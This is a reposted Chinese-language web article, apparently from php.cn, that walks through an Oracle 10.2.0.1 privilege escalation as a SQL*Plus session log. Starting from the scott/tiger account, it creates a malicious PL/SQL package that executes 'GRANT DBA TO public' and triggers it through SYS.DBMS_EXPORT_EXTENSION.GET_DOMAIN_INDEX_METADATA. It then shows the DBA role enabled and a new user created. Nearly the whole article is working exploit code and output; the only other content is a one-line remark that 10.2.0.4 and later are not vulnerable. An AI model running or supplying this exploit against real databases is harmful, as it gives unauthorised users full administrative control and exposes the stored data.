Oracle特权提升

WBOYOriginal: 2016-06-07 15:38:33997browse

以下为hack过程 Microsoft Windows [版本 5.2.3790] C:\Documents and Settings\Administratorsqlplus scott/tiger SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013 Copyright (c) 1982, 2005, Oracle. All rights reserved. 连

以下为hack过程

Microsoft Windows [版本 5.2.3790]

C:\Documents and Settings\Administrator>sqlplus scott/tiger

SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select * from session_privs;

PRIVILEGE
--------------------------------------------------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE

已选择9行。

SQL> CREATE OR REPLACE
2 PACKAGE MYBADPACKAGE authid current_user
3 IS
4 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
5 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
6 RETURN NUMBER;
7 END;
8 /

程序包已创建。

SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
2 IS
3 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
4 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
5 RETURN NUMBER
6 IS
7 BEGIN
8 EXECUTE IMMEDIATE 'GRANT DBA TO public';
9 RETURN 1;
10 EXCEPTION WHEN OTHERS THEN
11 EXECUTE IMMEDIATE 'GRANT DBA TO public';
12 return 1;
13 END;
14 END;
15 /

程序包体已创建。

SQL> DECLARE
2 INDEX_NAME VARCHAR2(200);
3 INDEX_SCHEMA VARCHAR2(200);
4 TYPE_NAME VARCHAR2(200);
5 TYPE_SCHEMA VARCHAR2(200);
6 VERSION VARCHAR2(200);
7 NEWBLOCK PLS_INTEGER;
8 GMFLAGS NUMBER;
9 v_Return VARCHAR2(200);
10 BEGIN
11 INDEX_NAME := 'A1'; INDEX_SCHEMA := 'SCOTT';
12 TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'SCOTT';
13 VERSION := '10.2.0.1.0'; GMFLAGS := 1;
14 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
15 INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
16 => TYPE_NAME,
17 TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
18 NEWBLOCK, GMFLAGS => GMFLAGS
19 );
20 END;
21 /

PL/SQL 过程已成功完成。

SQL> create user qwe identified by qwe;
create user qwe identified by qwe
*
第 1 行出现错误:
ORA-01031: 权限不足

SQL> set role dba
2 /

角色集

SQL> create user qwe identified by qwe;

用户已创建。

SQL> select * from session_privs;

PRIVILEGE
--------------------------------------------------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER

PRIVILEGE
--------------------------------------------------------------------------------
BECOME USER
.......

经测试，oracle10.2.0.4以上版本没这个安全漏洞

Statement：

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Previous article：JNI ERROR (app bug): accessed stale local reference 0xbc0002Next article：MyEclipse创建oracle连接

See more

Oracle特权提升

Related articles